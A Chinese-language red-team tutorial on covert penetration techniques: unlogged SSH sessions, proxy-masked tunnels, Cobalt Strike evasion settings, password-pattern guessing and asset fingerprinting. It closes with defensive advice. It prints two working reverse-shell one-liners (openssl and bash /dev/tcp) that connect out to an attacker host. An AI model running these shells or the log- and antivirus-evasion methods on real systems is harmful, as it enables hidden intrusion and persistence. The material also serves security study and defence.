红队实战攻防技术(二) - 高级渗透技巧与隐匿技术

1. 幽灵登录技术

1.1 无记录SSH登录

ssh -T root@192.168.1.1 /usr/bin/bash -i

• 特点：不分配伪终端，不会被w和last等命令记录
• 检测方法：
  • 使用lsof -i:22查看SSH端口连接
  • 使用ss -antp | grep sshd查看网络连接
• 隐匿进阶：
  • 使用肉鸡代理流量
  • VPN跳板
  • 基础隐匿设施

2. SSH隧道隐匿技术

2.1 传统SSH隧道问题

• 直接暴露真实IP地址
• 容易被识别为【SSH隧道代理事件】

2.2 高级隐匿方案

• Nginx反向代理：
  • 使用Ngrok或Heroku等服务
  • 或自建匿名域名及服务器
• 效果：
  • 显示为代理服务器IP而非真实IP
  • 连接端口与实际端口不同

3. 反弹Shell隐匿技术

3.1 常见反弹Shell命令

# 加密流量版本
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.0.100:2333 > /tmp/s; rm /tmp/s

# 常规版本
bash -c 'exec bash -i &>/dev/tcp/192.168.0.100/2333 <&1'

3.2 隐匿改进

• 采用反向代理技术
• 显示为代理域名而非真实IP
• 连接端口为前端转发端口

4. Cobalt Strike高级配置

4.1 Profile定制技巧

• 内存混淆：

  set obfuscate "true";
  

• 域前置配置：

  set cleanup "true";
  

4.2 免杀技巧

• 结合高信誉域名
• 自定义流量特征
• 可绕过卡巴斯基等杀软流量检测

5. 密码规律利用

5.1 运维密码惯性分析

• 常见模式：固定前缀/后缀+变化部分(如端口号)
• 示例：zzRedis63902020 (前缀+端口+后缀)

5.2 横向渗透应用

• 通过发现一个密码推测其他服务密码
• 适用于Redis等多种服务

6. 行为测绘技术

6.1 资产测绘三要素

1. Who - 资产归属(集团/子公司)
2. What - 业务系统/服务/框架
3. Where - 网络位置(内外网)

6.2 特征识别技术

• 常用特征：
  • favicon图标hash
  • HTTPS证书序列号
  • 前端代码段
  • 服务banner信息
• 示例应用：
  • 搜索port:23 +"goke login:"定位特定设备

6.3 HOSTS碰撞技术

• 针对Nginx反向代理的内网服务
• 使用内网域名尝试访问外网IP
• 可发现仅限内网访问的业务平台

7. 工具推荐

• Kunyu(坤舆)：
  • 高效的企业资产收集工具
  • 结合测绘数据进行深度信息收集
  • GitHub地址：knownsec/Kunyu

8. 防御建议

1. SSH监控：
   • 监控所有SSH端口连接，不依赖登录记录
2. 进程审计：
   • 定期检查异常网络连接和进程
3. 密码策略：
   • 避免使用可预测的密码模式
4. 流量分析：
   • 检测异常隧道和反弹Shell行为
5. 资产梳理：
   • 定期更新资产清单，消除暗资产

9. 法律声明

• 本文仅用于安全研究目的
• 禁止用于任何非法活动